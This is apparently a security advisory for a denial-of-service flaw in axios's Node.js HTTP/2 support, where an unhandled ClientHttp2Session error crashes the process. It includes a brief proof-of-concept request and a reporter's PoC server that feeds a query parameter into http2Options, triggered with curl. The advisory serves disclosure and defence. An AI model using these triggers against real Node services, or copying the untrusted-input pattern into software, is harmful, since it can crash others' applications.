Vulnerability GHSA-542g-h47m-68v8

High Risk
HIGH RISK
CVSS Score: 8.0
Score Range: 7.0–8.9
High severity vulnerabilities (CVSS 7.0–8.9). Serious vulnerabilities that should be prioritized soon after critical fixes.
2 hours ago
September 30, 2026 at 03:01 PM UTC
Axios: Denial of Service via Unhandled 'error' Event in HTTP/2 ClientHttp2Session Initialization
1.13.0 - 1.19.0
1.13.0 - 1.19.0

Summary

Axios: Denial of Service via Unhandled 'error' Event in HTTP/2 ClientHttp2Session Initialization

Details

Summary

Axios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.

This affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.

Impact

The impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.

This does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.

Affected Functionality

Affected path:

  • Node.js HTTP adapter
  • httpVersion: 2
  • HTTP/2 session creation/reuse through Http2Sessions
  • Network/session failures emitted as ClientHttp2Session error events

Caller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.

Technical Details

Http2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.

When the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.

Proof of Concept of Attack

import axios from './index.js';

await axios.get('http://127.0.0.1:1/', {
  httpVersion: 2,
  timeout: 1000
});

Expected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.

Workarounds

Disable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.

Original report

Hi, i'm RelunSec a security researcher working with InsiteTech.jp

i want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server

const http = require('http');
// Import the local axios version to ensure the patch is active
const axios = require('../../lib/axios.js').default; 
const url = require('url');

// A public HTTP/2 server to make internal requests to.
// This simulates an external service your application might interact with over HTTP/2.
const TARGET_URL = 'https://nghttp2.org/'; 
const PORT = 3000;

const server = http.createServer(async (req, res) => {
  const parsedUrl = url.parse(req.url, true);
  const http2optionId = parsedUrl.query.http2optionId;

  if (!http2optionId) {
  console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);
  res.writeHead(400, { 'Content-Type': 'text/plain' });
  res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\n');
  return; 
}

  console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);

  // Create an Axios instance configured for HTTP/2
  // The 'id' in http2Options makes each session configuration unique.
  const axiosInstance = axios.create({
    baseURL: TARGET_URL,
    httpVersion: 2,
    http2Options: {
      // rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert
      id: http2optionId, // This is the attacker-controlled unique part
    },
    // Adding a short timeout to prevent attacker from waiting too long if target is slow
    timeout: 5000 
  });

  try {
    const response = await axiosInstance.get('/');
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\nStatus: ${response.status}`);
  } catch (error) {
    // Check for the specific error indicating session limit reached
    if (error.isAxiosError && error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
    } else {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);
    }
  }
});

server.listen(PORT, () => {
  console.log(`PoC Server listening on http://localhost:${PORT}`);
  console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);
  console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);
  console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);
});

i tested all that in latest git version, after starting the server.cjs, to trigger that you just need do

relunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi
curl: (52) Empty reply from server

that is extremly simple to trigger

it confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash

Impacted packages

Timeline

Published
2 hours ago
September 30, 2026 at 03:01 PM UTC
Fixed (1.20.0)
1 month ago
August 26, 2026 at 08:20 AM UTC
Last Modified
2 hours ago
September 30, 2026 at 03:15 PM UTC